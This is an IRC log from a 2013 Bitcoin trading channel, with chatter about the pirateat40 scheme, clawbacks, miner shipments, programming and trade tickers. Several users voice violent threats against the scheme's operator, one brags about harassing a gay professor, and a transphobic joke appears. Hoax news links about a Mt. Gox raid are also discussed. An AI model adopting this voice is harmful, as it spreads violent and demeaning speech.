02 07:54:43 dub odd, didn't they get a lot from selling chips ?! May 02 07:54:48 call the sec about the 300principal, 1300 interest coins or so i lost May 02 07:55:01 that i gave to someone else and believe existed May 02 07:55:12 mircea_popescu: yeah, more hashing too May 02 07:55:16 0.00735415 this week May 02 07:55:32 thing is im not so sure priate has much of anything left May 02 07:55:41 so what dude May 02 07:55:44 my effort is trying to get my coins from mt gox from bitcoinica May 02 07:55:49 i don't care now i just want to kill him or hurt him May 02 07:55:49 dub so what's the word ? May 02 07:55:55 jcpham, lol May 02 07:55:56 money doesn't matter anymore May 02 07:55:57 thats fucked up May 02 07:55:58 bird May 02 07:56:00 so May 02 07:56:01 is the word May 02 07:56:03 there are a lot of rich bitcoiners now who want to hurt pirate May 02 07:56:08 a lot of people should die May 02 07:56:12 not my problem May 02 07:56:15 im pretty sure one of them will do something sooner or alter May 02 07:56:21 the dipshit doesnt realize i hosted btclending.com back in the day May 02 07:56:23 lmao. May 02 07:56:31 AM kept 2000 back for reinvestment upcoming May 02 07:56:32 but really pirate knows that, he much be a scarred pussy right now May 02 07:56:36 "i'm sure someone else will put the work in sooner or later" May 02 07:56:38 if i see him i'll shoot at him May 02 07:56:41 for sure May 02 07:56:58 i'm not fond of liars May 02 07:57:00 ive spoken with numerous guberment peeps May 02 07:57:01 jborkl a they provisioned for the next batch ? May 02 07:57:03 and he got me good May 02 07:57:05 mircea_popescu: http://www.youtube.com/watch?v=2WNrx2jq184 May 02 07:57:31 specifically the collins county DA's office May 02 07:57:32 i'll shoot him in the foot for you then grubles May 02 07:57:33 grubles any of the govt people going to do anything? May 02 07:57:40 they can catch him limping May 02 07:57:54 yes.from what i understand next batch is funded May 02 07:58:06 or one of those rabbit traps with a carrot May 02 07:58:12 lol dude you know itd be stupid for me to condone that shit in words on the gd internet May 02 07:58:13 and string May 02 07:58:23 yeah i'm just kidding May 02 07:58:27 jborkl 2k coins is like 1/4 mn or w/e. pretty cool. May 02 07:58:30 i'd never advocate violence May 02 07:58:43 unless stole a lot of money from me by lying to me May 02 07:58:46 i know but some people are stupid May 02 07:58:47 15th is still on track says firedcat, fucking awesome May 02 07:58:59 i had 1k btc as principal May 02 07:59:07 i'm osrry May 02 07:59:16 it's gone now May 02 07:59:18 massive USB stick miner release and upcoming orders i am guessing May 02 07:59:18 12-13k eventually over time May 02 07:59:24 fudge May 02 07:59:36 well May 02 07:59:40 i lost my money with pirate but i did not lend more than i could lose, i realize how silly it was and well, lesson learned May 02 07:59:43 it was paper money May 02 07:59:53 he is only about the 20th person who has scammed me May 02 08:00:05 i probably withdrew way more than 1k over the course of btcst May 02 08:00:12 principal is all that existed May 02 08:00:23 grubles then if you took more than you got in the govt can take that from you May 02 08:00:26 and that was back in $2 days May 02 08:00:42 just like the maddof pervz May 02 08:00:45 if i took more than i got? May 02 08:00:47 what does that mean May 02 08:00:53 i've walked away from because the only real money was on the blockchain May 02 08:01:00 if you make 1200 and lost 1000 the govt can and will take that 200 from you May 02 08:01:02 like all those paypal buys grubles May 02 08:01:08 i should be pissed at you May 02 08:01:11 for selling me nothing May 02 08:01:14 but i'm not May 02 08:01:24 whatchu talkin bout May 02 08:01:26 does that make sense May 02 08:01:26 grubles you never withdrew anything ? May 02 08:01:33 i probably withdrew way more than 1k over the course of btcst May 02 08:01:38 like when i'd buy coins from your account May 02 08:01:40 a ok. so then... May 02 08:01:49 and they'd get transferred to my May 02 08:01:51 account May 02 08:01:52 he took out more than he put in, and he is telling that to the govt, facepalm May 02 08:01:54 that was all fake May 02 08:01:54 oh gotcha May 02 08:01:55 jcpham, May 02 08:02:05 see what i mean? May 02 08:02:11 yeah facepalm im being honest May 02 08:02:16 yeah May 02 08:02:22 are you willing to give that extra to the govt? May 02 08:02:24 so i've moved on now May 02 08:02:25 unlike some peeps in here May 02 08:02:48 the principal and what existed on the blockchain is all that ever be proven May 02 08:03:00 anything else is imaginary pirate math May 02 08:03:15 i suppose May 02 08:03:18 grubles do what you want but if pirate gets charged they will then go after people like you who made money on this and try to get it back, they did it to madoff May 02 08:03:31 ^ May 02 08:03:32 you can see if you made money or not May 02 08:03:38 it's on the blockchain May 02 08:03:41 methinks grubles didn't think this whole thing through May 02 08:03:43 lol im 24 years old May 02 08:03:49 deposit address/withdrawal addres May 02 08:03:56 subtract the difference May 02 08:03:57 there's a thing called clawback May 02 08:04:13 right May 02 08:04:14 if you deposited 1k, withdrew 1.15k and consider yourself a victim May 02 08:04:18 trust me ive got it covered May 02 08:04:22 clawback, that is the word i was looking for May 02 08:04:23 you're good for 150 btc * 100 = 15k May 02 08:04:41 i moved on because of that May 02 08:04:44 or w/e the price ends up being May 02 08:04:46 obv this shit is complicated May 02 08:04:48 according to the blockchain i lost May 02 08:04:48 as we all know May 02 08:05:01 see people whgo lost money can sue you grubles for the money you made in civil court May 02 08:05:30 ok so what is considered "lost money" May 02 08:05:44 "A pupil shall be permitted to participate in sex-segregated school programs, and activities, and facilities, including athletic teams and competitions, and use facilities consistent with his or her gender identity, irrespective of the gender listed on the pupil’s records." May 02 08:05:51 my definition is anything depostid not returned May 02 08:05:51 i thin this is why the govt is having such a hard time, cuz the govt wants to charge everyone involved (or take their money) so no one is helping them May 02 08:06:05 dude back in my day i didn't have to claim i feel like a girl to hang out in the girls' locker room. May 02 08:06:17 returned in what though May 02 08:06:19 btc? usd? May 02 08:06:40 "the govt" as in who exactly May 02 08:06:41 SEC? May 02 08:06:41 blockchain May 02 08:06:46 btc May 02 08:06:57 funds went in via blockchain May 02 08:07:00 the SEC is only concerned with bullshit investment opportunities May 02 08:07:03 they left via blockchain May 02 08:07:14 so they care about promised interest May 02 08:07:16 as soon as pirate started attracting investors he started pissing in the wind May 02 08:07:18 good luck May 02 08:07:22 the SEC i think is being used to gather info, who will then p[ass it along to fbi and what not May 02 08:07:31 the sec does do that you knopwq,... May 02 08:07:31 no May 02 08:07:50 well they do, May 02 08:07:58 they even told me that when they wanted me to be a witness May 02 08:08:03 my talks with pirate were about keeping coins off the market May 02 08:08:03 in the e-mail May 02 08:08:05 p. moustakis, head attorney, submits info to a committee which then reviews it May 02 08:08:09 purposefully raising the price May 02 08:08:24 i should shut up May 02 08:08:32 grubles if you are claiming the sec never shares info with the fbi and other departments, i lulz at you May 02 08:09:00 oh i dunno if they do or not May 02 08:09:02 they probably do May 02 08:09:08 its a fact they do May 02 08:09:16 https://bitcointalk.org/index.php?topic=192122.0;all May 02 08:09:17 a still think any entity that can keep coins off of exchanges in an organized fashion is winning May 02 08:09:20 this thread is pretty epic. May 02 08:09:25 hedge fund/pirate fund/ whatever May 02 08:11:43 pirate spoke about a 'client' that fucked him over May 02 08:11:50 probably bullshit May 02 08:11:50 but May 02 08:12:08 id like to know who that person it May 02 08:12:09 is May 02 08:12:12 * May 02 08:15:01 urmom ? May 02 08:15:35 i wish May 02 08:15:43 [WTB] ASICMINER share call options May 02 08:15:44 lmao May 02 08:15:52 god almighty all these muppets. May 02 08:16:02 whai May 02 08:16:09 i think few people realise that the main brake to btc adoption is simply that people are too stupid. May 02 08:16:20 all this "o 1mn dollah by xmas" May 02 08:16:37 well... if a hundred million people didn't include ninetynine million and change idiots, maybe. as it is... nowai. May 02 08:22:38 grubles might it be that other ponzi umm wtf was it called... May 02 08:22:43 it went tits up same day May 02 08:22:59 the irl one you mean ? May 02 08:23:12 yeah May 02 08:23:17 fuck what was the name of it? May 02 08:23:47 mmm something or the other. May 02 08:24:01 grubles did you ever hear of that other ponzi? May 02 08:24:02 so many of those irl ;/ May 02 08:24:07 they were paying out 1.5% a day May 02 08:24:14 pirates wife talked about it on twater May 02 08:24:19 ;;title https://bitcointalk.org/index.php?topic=188933.0 May 02 08:24:22 [WTB] Mail order bride May 02 08:24:23 and they went bust same day May 02 08:24:25 win May 02 08:26:40 oh May 02 08:26:44 PS. I really get high every time I taste good water. Even yesterday EuroTrash though I was drunk (I wasn't). May 02 08:26:48 something rewards May 02 08:26:52 https://bitcointalk.org/index.php?topic=190912.msg2002016#msg2002016 May 02 08:26:59 he gets high on water? May 02 08:27:31 https://bitcointalk.org/index.php?topic=190912.msg1996855#msg1996855 same thread but lol wtf May 02 08:27:36 zeeks rewards May 02 08:27:42 that might have been his client May 02 08:27:56 ya that! May 02 08:28:08 mp reads the posts i linked you to May 02 08:29:19 he gets drunk on "good water" May 02 08:29:21 hahahahaha May 02 08:29:58 still the tortilla dude ? May 02 08:30:04 he's pretty freaky. May 02 08:30:06 finland guy May 02 08:30:18 grubles i've interacted with a lot of bitcoiners as have you guys May 02 08:30:21 he says he is the forum troll now May 02 08:30:27 "I have the actual ability to keep Bitcoin network and bitcoin price up indefinitely long" May 02 08:30:29 etc. May 02 08:30:29 it's hard to imagine pirateat40 had some client May 02 08:30:36 we haven't found out about yet May 02 08:30:40 i think he is high or a good troll May 02 08:30:50 in bitcoin land May 02 08:30:53 that is May 02 08:33:23 [BTCTC] [BASIC-MINING] 1 @ 0.428 BTC [+] May 02 08:34:56 Chaang-Noi certainly a good troll. May 02 08:34:59 maybe the best yet. May 02 08:35:48 well, he might be for real May 02 08:36:01 this might play well for selling silver in finland May 02 08:36:37 he might just be so out of it May 02 08:37:52 that's always the hallmark of a good troll. May 02 08:38:37 well i think he might really be trying to be respected and be a playing, but everyone is laughing at him May 02 08:38:43 player May 02 08:38:50 im not so sure he knows what he is doing May 02 08:40:11 [BTCTC] [ASICMINER-PT] 1 @ 1.2879 BTC [-] May 02 08:40:24 go AM May 02 08:40:50 [MPEX] [S.MPOE] 7350 @ 0.00068748 = 5.053 BTC [+] May 02 08:41:15 [BTCTC] [ASICMINER-PT] 17 @ 1.2879 = 21.8943 BTC [-] May 02 08:43:40 [BTCTC] [ASICMINER-PT] 10 @ 1.288 = 12.88 BTC [+] May 02 08:46:19 [BTCTC] [ASICMINER-PT] 10 @ 1.288 = 12.88 BTC [+] May 02 08:46:47 got in just in time for divs May 02 08:47:34 :) May 02 08:47:38 i like has dividends May 02 08:49:55 Chaang-Noi i wonder if he now makes some posts going "O here I am the REAL rpietilla this other guy stole my identity May 02 08:50:08 actually fuck that. some forum troll should do it. May 02 08:50:10 where's atlas May 02 08:50:21 lol May 02 08:50:41 i wonder if people go to findland and no one is there May 02 08:51:44 bfl shipped wtf is this? May 02 08:51:51 more than just the small ones? May 02 08:52:02 burnside2 got the div thanks May 02 08:52:32 woot May 02 08:52:54 Chaang-Noi link ? May 02 08:53:07 https://bitcointalk.org/index.php?topic=178336.msg2002185#msg2002185 May 02 08:53:14 its not very full of info May 02 08:53:17 its why i asked here May 02 08:53:26 some people said something about emails as well May 02 08:53:28 i dont know... May 02 08:53:31 they emailed today May 02 08:53:37 what did they say? May 02 08:53:39 a ok May 02 08:53:46 asking for confirmation of acceptance to the product changes May 02 08:53:58 ph May 02 08:54:00 oh May 02 08:54:08 well lol May 02 08:54:15 and if we so no we get a refund? May 02 08:54:27 yes, or if you ignore the email May 02 08:54:48 haha cute May 02 08:54:57 if you ignor, you get refund? oh lol May 02 08:55:10 so much for them sending extra to make up for it May 02 08:55:15 i hope they get sued May 02 08:55:28 they are May 02 08:55:37 good May 02 08:56:40 they are getting ample sued. May 02 08:56:53 which i find a little silly, i dunno wtf these people think they;ll do with the judgements. May 02 08:56:54 but anyway. May 02 08:57:07 not sure how May 02 08:57:15 ill lol after the make this asll, then say we are getting sued cant ship.. then they mine and keep all btcs May 02 08:57:25 you either agree to accept the new terms and receive altered product May 02 08:57:30 or get refund May 02 08:57:42 I assume this is to avoid gettign sued May 02 08:58:03 can they force give you a refund like a year after you buy something? May 02 08:58:24 dub plenty of cases of action. May 02 08:58:25 probably May 02 09:05:34 [BTCTC] [ASICMINER-PT] 2 @ 1.27 = 2.54 BTC [-] May 02 09:10:35 dub did they say when they would ship the bigger units? May 02 09:11:39 "Shipping of our BitForce SC ASIC miners has begun! " May 02 09:12:01 but that probably doesnt count for the bitbet on the july date May 02 09:12:17 since apparently we're basing the specs on the cancelled jalapeno specs? May 02 09:12:35 inhies when was the june bet made ? May 02 09:13:28 "The Block Erupter USB sticks passed all the tests and we are about to produce them in quantity." May 02 09:13:30 w00t May 02 09:13:55 thise are stupid May 02 09:14:00 those* May 02 09:14:10 but they will sell, and make my ass rich May 02 09:14:25 mircea_popescu: the july bet was made 1 month 2 weeks ago (15-03-2013) May 02 09:14:31 inhies: todays email is the first notification I've had from BFL about power usage changes May 02 09:14:32 i need more hookers and blow, i only have enough cash for thenext 20 years May 02 09:14:42 inhies rthey hadn't changed their spec midmarch yet had they ? May 02 09:15:19 Chaang-Noi, me too... May 02 09:15:37 life is so boring without silk roads now May 02 09:15:44 ha, i buy locally May 02 09:15:53 im not going to have drugs sent to thailand, hahaha May 02 09:16:05 ah you'd be crazy of course May 02 09:16:12 you just go to a pharmacy there May 02 09:16:16 and hookers... May 02 09:16:20 oh boy May 02 09:16:22 :) May 02 09:16:27 wish I were you hehe May 02 09:16:33 :) May 02 09:16:50 i wont lie, life is over all pretty damn good May 02 09:16:51 mircea_popescu: im just referring to that thread where the specs that are used are apparently from 2012 May 02 09:17:03 well those were their specs. May 02 09:17:09 afaik they changed them sometime late march ? May 02 09:17:11 for a cancelled product May 02 09:17:19 they arent shipping jalalpenos May 02 09:17:26 yes they are May 02 09:17:29 or when did they actually change them May 02 09:17:38 [BTCTC] [B.YABMC] 34 @ 0.0142 = 0.4828 BTC [+] May 02 09:17:49 dub lol basically bfl has found the way to prevent being humiliated by nondelivery bets : create spec confusion. May 02 09:18:06 how did that difficulty 10 million bet work out? May 02 09:18:07 this is at the bottom of todays email May 02 09:18:08 Jalapenos Out the Door May 02 09:18:10 Packaged for its adventure to a new home. Bye Jalapeno! Your owner eagerly awaits your arrival. May 02 09:18:21 http://www.thegenesisblock.com/got-a-question-get-in-touch/ May 02 09:18:26 [BTCTC] [PAJKA.BOND] 2 @ 0.10475 = 0.2095 BTC [-] May 02 09:18:26 sounds like they're shipping japaenos May 02 09:18:26 anyone know who this is May 02 09:18:44 [BTCTC] [ASICMINER-PT] 1 @ 1.29 BTC [+] May 02 09:18:46 jonathan stacke operates this blog May 02 09:18:49 jcpham is this the anti-foundation ? May 02 09:18:53 Difficulty 10,076,293 haha it went over, wow, damn close eh May 02 09:18:56 this name is not familiar May 02 09:19:11 [BTCTC] [ASICMINER-PT] 2 @ 1.2946 = 2.5892 BTC [+] May 02 09:19:15 john smith? May 02 09:19:16 nice blog May 02 09:19:22 iv heard it before May 02 09:19:39 inhies: sup? May 02 09:20:32 dub: wat May 02 09:20:36 oh the email thing May 02 09:20:39 fair enough May 02 09:20:52 i thoguth they werent making that product anymore May 02 09:20:55 and it was replaced May 02 09:21:06 but this could just be BFL being stupid woth words again, not sure May 02 09:21:08 ¯\_(ツ)_/¯ May 02 09:30:54 davinci sleep May 02 09:30:59 try it May 02 09:31:22 aka polyphasic sleep May 02 09:31:34 uberman schedule May 02 09:32:03 yeah, also called uberman.. May 02 09:32:09 I think uberman is a bit different May 02 09:32:44 isn't that 6hours and then 30minutes? May 02 09:33:18 what kind of work are you in? May 02 09:33:52 if it's something you wouldn't be able to take a 20 minute nap.. you'll never be able to sustain it May 02 09:34:03 ever 4 hours May 02 09:34:39 i recall kramer did that. May 02 09:34:46 I like my 10 hours May 02 09:35:53 [BTCTC] [PAJKA.BOND] 1 @ 0.10474 BTC [-] May 02 09:37:13 [BTCTC] [PAJKA.BOND] 9 @ 0.10475 = 0.9428 BTC [+] May 02 09:38:58 his secret might be also a meth addiction May 02 09:39:08 jk May 02 09:39:15 [MPEX] [S.MPOE] 32200 @ 0.00069254 = 22.2998 BTC [+] May 02 09:39:17 [MPEX] [S.MPOE] 15050 @ 0.00069722 = 10.4932 BTC [+] May 02 09:39:17 [MPEX] [S.MPOE] 8485 @ 0.00070278 = 5.9631 BTC [+] May 02 09:39:19 [MPEX] [S.MPOE] 1500 @ 0.00070373 = 1.0556 BTC [+] May 02 09:39:33 [MPEX] [S.MPOE] 7286 @ 0.0007057 = 5.1417 BTC [+] May 02 09:39:35 [MPEX] [S.MPOE] 16967 @ 0.0007058 = 11.9753 BTC [+] May 02 09:39:36 [MPEX] [S.MPOE] 8700 @ 0.00070625 = 6.1444 BTC [+] May 02 09:39:47 I like a good night's rest, 8-10 hours gone, but a clear mind the rest of the day May 02 09:39:49 [MPEX] [S.MPOE] 4109 @ 0.00070678 = 2.9042 BTC [+] May 02 09:39:51 [MPEX] [S.MPOE] 3050 @ 0.00070991 = 2.1652 BTC [+] May 02 09:40:21 how old are you? May 02 09:40:25 and do you have children? May 02 09:40:52 well once you get used to being woken up every couple of hours May 02 09:41:33 and I think it's when you're in your 50s or something you start to really decline in sleep May 02 09:42:05 but I know a guy who practices microsleeps May 02 09:42:26 literally sleeps while waiting at traffic lights for example May 02 09:42:33 so he doesn't need to sleep at night May 02 09:42:41 lol May 02 09:42:42 to each his own May 02 09:43:33 but when he does sleep at night, you really can't wake him up anymore May 02 09:43:45 that fucker puts his alarm clock at 5 am May 02 09:43:56 we were sharing a hotel room May 02 09:44:12 guess who got woken up May 02 09:44:16 and pissed off May 02 09:44:45 I read a book about about Fatal familial insomnia May 02 09:44:55 hen you really appreciate your sleep May 02 09:45:34 well he does function as a manager, busting other people's balls May 02 09:46:07 but it all seems unhealthy and kind of a bragging thing May 02 09:46:43 I've done academia research and am a software developer. No way I will produce quality without 8 hrs sleep May 02 09:46:58 but probably could bust people's balls 24/7 May 02 09:47:13 :) May 02 09:47:53 kinda reminds of a bet they did on TV here May 02 09:48:14 the bet was if you could stay awake for 48hrs May 02 09:48:18 without nodding off May 02 09:48:34 the guy who won cheated and admitted he took amphetamines May 02 09:48:35 hehe May 02 09:49:46 apparently it's not that easy May 02 09:49:57 you sleep a couple of mins without noticing May 02 09:50:51 absolute paths don't sound fantastic though May 02 09:51:52 ah ok May 02 09:52:14 I absolutely hate the obligatory __self__ parameter in every method May 02 09:52:17 if I recall well May 02 09:52:30 indeed May 02 09:52:36 everybody knows the explicit self May 02 09:53:00 any reason to prefer it to ruby? May 02 09:53:14 I've only used it 8 years ago or so May 02 09:53:32 but it's just another language May 02 09:53:43 I can't count the languages I use May 02 09:53:54 hehe May 02 09:54:06 it's named after Monty Python, so there May 02 09:54:09 nothing beats that May 02 09:54:35 that's true May 02 09:55:04 those are closures May 02 09:55:13 I've got a lisp background too :) May 02 09:55:31 fucking parantheses till you die May 02 09:55:35 but brilliant language May 02 09:55:49 I actually programmed in scheme more May 02 09:56:27 I really appreciate the CS uni education I had May 02 09:56:43 we got Scheme, Lisp, Smalltalk, and bitfuck C May 02 09:57:38 my favorite project was to extend the language that our professor made (Pico) May 02 09:58:06 it's a functional lisp like language with a c-like syntax May 02 09:58:47 man you learn a lot then May 02 09:58:57 I plastered my walls with all the code May 02 09:59:12 those were the days May 02 09:59:43 interpreted May 02 09:59:54 we had to write compilers too May 02 10:00:25 I've got my own language on my name too :) May 02 10:00:30 a declarative language May 02 10:00:45 pretty proud of that May 02 10:01:06 well we started a spin-off at university May 02 10:01:19 the product was an engine that does format translations May 02 10:01:27 e.g. from one kind of xml to another or sql May 02 10:01:41 so you declare the semantics of you schema May 02 10:02:01 and you declared that in Ω-RIDL May 02 10:02:04 ;;ticker May 02 10:02:04 BTCUSD ticker | Best bid: 118.46757, Best ask: 118.75851, Bid-ask spread: 0.29094, Last trade: 118.75851, 24 hour volume: 171386.05891753, 24 hour low: 104.00000, 24 hour high: 133.74990, 24 hour vwap: 117.82079 May 02 10:02:22 so you actually explain in almost natural languages what the schemas mean May 02 10:02:32 and then an engine figures it all out May 02 10:02:43 and translates your data to any format it understands May 02 10:02:53 I wrote the prototype in Ruby May 02 10:03:03 that was slow as fuck May 02 10:03:22 wrote it in Java afterwards May 02 10:03:35 since it needed to be implemented in a service bus and platform independent May 02 10:03:43 and yes wrote a parser May 02 10:03:58 in sablecc if I recall correctly May 02 10:04:10 it's not open source May 02 10:04:18 but patent is public May 02 10:04:26 and there are papers May 02 10:04:35 this is my real name May 02 10:04:48 [BTCTC] [BASIC-MINING] 1 @ 0.400001 BTC [-] May 02 10:04:51 and it's a unique reference to only 1 person on this earth I think May 02 10:05:15 I know May 02 10:05:31 mixed blessing May 02 10:05:39 at least my first name is pronouncable in English May 02 10:05:52 that matters more than you can imagine May 02 10:06:27 formal logic May 02 10:06:35 but that's from long ago though May 02 10:06:54 Framedragger!*@* added to ignore list. May 02 10:07:06 yup May 02 10:07:39 yes it does May 02 10:07:48 but I'm not taking all the credit May 02 10:08:01 most of that shit I learned from my professor then May 02 10:08:23 main thing to learn is the difference between syntax and semantics May 02 10:09:16 but he was gay so we basically made his life hell for it May 02 10:09:34 yeah just generalizing May 02 10:09:54 brilliant minds are rarely appreciated at their currenttime May 02 10:10:31 of course it shouldn't May 02 10:11:09 unless they start putting penises in the software May 02 10:11:10 ur an Operating Thetan? May 02 10:11:26 like I suspected a gay colleague to be doing May 02 10:11:32 or maybe it was me May 02 10:11:38 or he was screwing with my mind May 02 10:11:47 he did UI design May 02 10:12:10 I was kind of a team lead May 02 10:12:15 and we all went yeah that looks good May 02 10:12:28 but then I said, but… it looks like a penis there May 02 10:12:32 damn it May 02 10:12:48 and then they all saw the penis May 02 10:13:08 it's like being told, do you hear that squeeky noise? May 02 10:13:12 you never heard it before May 02 10:13:16 but since then May 02 10:13:32 you won't be able to get it out of your head May 02 10:13:39 so he had to redesign a lot May 02 10:13:57 well I found it hilarious May 02 10:14:08 I hope he did too May 02 10:14:54 well we're still in touch, if I dare to express it like that May 02 10:15:01 as in, we still speak May 02 10:15:04 online May 02 10:15:09 so there's no resentment May 02 10:15:52 agaisnt me letting him redesign UI because I saw a penis in it May 02 10:16:28 and telling him I wanted a UI that made me think of rainbows May 02 10:16:58 a gay guy that worked for my company May 02 10:17:08 also quite brilliant guy in UI May 02 10:17:41 well he did explain some nasty shit May 02 10:17:45 sometimes May 02 10:18:00 guess that was my punishment then May 02 10:18:07 to hear what he sometimes got up to May 02 10:19:03 yes I have that suspicion as well, in the best research unit of uni 50% was gay May 02 10:20:06 I don't mind, it's kind of interesting, but sometimes a bit too much detail May 02 10:20:24 spending a week on a gay cruise boat May 02 10:20:33 that's all I need to hear May 02 10:20:44 I don't need further details May 02 10:21:05 some of the advice is also hilarious May 02 10:21:22 if you ever go to a dark room, whatever you do, don't touch the walls May 02 10:21:29 thanks for the advice mate May 02 10:22:27 I don't think they clean the walls a lot May 02 10:22:30 nuff said May 02 10:23:00 okay enough entertainment, gotta do some work May 02 10:23:25 :) May 02 10:26:06 11,787.70 GH/s Wink May 02 10:27:05 where do I dump my coins to be promised I will get some of that? May 02 10:27:43 so wait, they finally get to 12th in may ? May 02 10:28:51 my worst fear is being on the toilet when DHL delivers my Avalons May 02 10:29:02 and be just too late May 02 10:32:06 [MPEX] [S.BBET] [PAID] 12.4330791 BTC to 3`000`000 shares, 414 satoshi per share May 02 10:33:22 Where are my dragons.....ehh 55TH ? :( May 02 10:38:14 [MPEX] [S.MPOE] 6900 @ 0.00071 = 4.899 BTC [+] May 02 10:58:16 [BTCTC] [ASICMINER-PT] 5 @ 1.29 = 6.45 BTC [-] May 02 10:58:26 [BTCTC] [ASICMINER-PT] 3 @ 1.2949 = 3.8847 BTC [+] May 02 10:58:49 [BTCTC] [ASICMINER-PT] 1 @ 1.295 BTC [+] May 02 10:58:54 [BTCTC] [ASICMINER-PT] 1 @ 1.295 BTC [+] May 02 10:59:04 [BTCTC] [ASICMINER-PT] 2 @ 1.299 = 2.598 BTC [+] May 02 11:16:17 [BTCTC] [BTC-BOND] 18 @ 0.010001 = 0.18 BTC [-] May 02 11:17:12 [BTCTC] [COGNITIVE] 2 @ 0.26 = 0.52 BTC [+] May 02 11:28:56 [BTCTC] [ASICMINER-PT] 1 @ 1.299 BTC [+] May 02 11:54:05 [BTCTC] [PAJKA.BOND] 3 @ 0.10474 = 0.3142 BTC [-] May 02 12:00:18 [MPEX] [S.MPOE] 6411 @ 0.00071259 = 4.5684 BTC [+] May 02 12:02:39 http://trilema.com/2013/mpex-one-year-of-dividends/ May 02 12:02:42 data and stuff May 02 12:08:01 nice scarface suit May 02 12:08:49 not enough data, cant chart it :( May 02 12:10:24 hehe. for bitcoinland that's TONS of data. May 02 12:10:50 https://www.youtube.com/watch?v=94IdL3djJVU hmm May 02 12:11:53 i want to try running mpex data through sierra charts **** BEGIN LOGGING AT Thu May 2 16:21:04 2013 May 02 16:25:42 ;;next May 02 16:25:43 target: 127, 130, 136 | updated by OneFixt at May 1 2013, 19:37 UTC ( tips: http://bit.ly/YnxUM4 ) | disclaimer: http://bit.ly/129bYJ6 | this is not investment or trading advice | #bitcoin-analysis | 17 hours, 48 minutes, and 41 seconds ago May 02 16:25:46 lol May 02 16:25:49 ;;ticker May 02 16:25:50 BTCUSD ticker | Best bid: 111.58999, Best ask: 111.99999, Bid-ask spread: 0.41000, Last trade: 111.99999, 24 hour volume: 205521.58405264, 24 hour low: 104.00000, 24 hour high: 131.00000, 24 hour vwap: 116.42585 May 02 16:25:50 Bears are pretty inventive : Bear are pretty inventive May 02 16:26:01 so mtgox getting raided huh. May 02 16:26:02 http://ireport.cnn.com/docs/DOC-957375 May 02 16:26:13 raided? May 02 16:26:20 yeah. May 02 16:26:39 like as in authorities swooping into HQ? May 02 16:26:39 check my link May 02 16:26:42 yeah. May 02 16:26:44 Zimbabwe is broke, so btc is broke May 02 16:26:49 nice link May 02 16:26:52 haha May 02 16:26:53 cool story May 02 16:26:58 is 100% bs May 02 16:27:02 zimbabwae thing is bs May 02 16:27:09 all May 02 16:27:55 mt gox raided: "This topic has been moved to Trashcan. " May 02 16:28:07 bear spread FUD :) bull spread BS ! hard time May 02 16:28:36 bulls raise prices, bears lower prices ! hard time already May 02 16:29:12 who has a positive earning strategy.py file? May 02 16:31:22 [BTCTC] [ASICMINER-PT] 1 @ 1.29899 BTC [+] May 02 16:32:05 [BTCTC] [ASICMINER-PT] 18 @ 1.299 = 23.382 BTC [+] May 02 16:32:33 [BTCTC] [PAJKA.BOND] 1 @ 0.1 BTC [-] May 02 16:34:09 (9:27:03 AM) ThickAsThieves: zimbabwae thing is bs May 02 16:34:17 (9:28:08 AM) error4733: bear spread FUD :) bull spread BS ! hard time May 02 16:34:37 I think error4733 called ThickAsThieves a BS spreading bull May 02 16:36:02 http://trilema.com/2013/any-questions/ May 02 16:36:06 everyone check that one out :D May 02 16:36:53 [BTCTC] [ASICMINER-PT] 19 @ 1.3 = 24.7 BTC [+] May 02 16:36:53 ThickAsThieves i am so impressed the forum will try and keep a lid on it. srsly now. May 02 16:38:11 http://ireport.cnn.com/docs/DOC-966426 May 02 16:38:13 LMAO May 02 16:39:09 wtf May 02 16:39:11 that is fake May 02 16:39:24 orly. May 02 16:39:24 the ireport thingy May 02 16:39:40 lol May 02 16:39:49 that ireport is a personal blog area May 02 16:39:54 not actually cnn May 02 16:39:58 ... May 02 16:40:18 bitcoin sachs is the same guy that posted the zimbab thing May 02 16:40:28 lol May 02 16:40:35 didnt know that May 02 16:40:36 that pic is off police looking at a map or something May 02 16:40:40 trying to find gox? May 02 16:40:42 hehe May 02 16:40:47 at the lag engine :D May 02 16:41:08 one cop has a frommers in hand or something May 02 16:41:10 lol May 02 16:41:37 it's from a movie May 02 16:41:39 lol May 02 16:42:32 [BTCTC] [BITVPS] 1 @ 0.00148 BTC [-] May 02 16:42:35 [BTCTC] [BITVPS] 1 @ 0.0014 BTC [-] May 02 16:44:06 here's the image on some wordpress post from 2011 May 02 16:44:06 http://allanmcdaniel.files.wordpress.com/2011/06/084.jpg May 02 16:44:27 others from 2009 May 02 16:45:03 [HAVELOCK] [VTX] 1 @ 0.4600001 BTC [-] May 02 16:45:04 [HAVELOCK] [VTX] 10 @ 0.46 = 4.6 BTC [-] May 02 16:47:08 seems legit. May 02 16:47:31 i put a warning before "bear are inventive" May 02 16:48:22 but a fking retard on bitcoin.fr put the zimbab news on front page... May 02 16:49:08 priceless ! same when a friend post on facebook a onion link on first degre haha May 02 16:50:48 [MPEX] [S.MPOE] 5189 @ 0.00071259 = 3.6976 BTC [+] May 02 16:50:50 [MPEX] [S.MPOE] 5868 @ 0.00071946 = 4.2218 BTC [+] May 02 16:52:57 fucking lag! May 02 16:53:19 omg i think the report thing on can caused the down at the moment May 02 16:53:21 hallo. May 02 16:53:42 [BTCTC] [BITVPS] 1 @ 0.00139 BTC [-] May 02 16:53:47 so crazy how easy the market can be influenced May 02 16:53:48 ... May 02 16:53:53 [BTCTC] [BITVPS] 10 @ 0.0011 = 0.011 BTC [-] May 02 16:53:57 [BTCTC] [ASICMINER-PT] 1 @ 1.27012 BTC [-] May 02 16:53:59 [BTCTC] [BITVPS] 2500 @ 0.00109 = 2.725 BTC [-] May 02 16:54:03 [BTCTC] [ASICMINER-PT] 1 @ 1.27011 BTC [-] May 02 16:54:04 [BTCTC] [BITVPS] 242 @ 0.00108 = 0.2614 BTC [-] May 02 16:54:08 [BTCTC] [ASICMINER-PT] 1 @ 1.26209 BTC [-] May 02 16:54:10 [BTCTC] [BITVPS] 20 @ 0.00108 = 0.0216 BTC [-] May 02 16:54:10 i dont think those articles influenced much May 02 16:54:14 [BTCTC] [ASICMINER-PT] 1 @ 1.26207 BTC [-] May 02 16:54:15 [BTCTC] [BITVPS] 227 @ 0.00107 = 0.2429 BTC [-] May 02 16:54:20 [BTCTC] [ASICMINER-PT] 1 @ 1.262057 BTC [-] May 02 16:54:26 [BTCTC] [ASICMINER-PT] 1 @ 1.262046 BTC [-] May 02 16:54:42 [BTCTC] [ASICMINER-PT] 2 @ 1.262011 = 2.524 BTC [-] May 02 16:54:50 what do you think is the reason for the current down? May 02 16:55:06 [BTCTC] [ASICMINER-PT] 1 @ 1.262 BTC 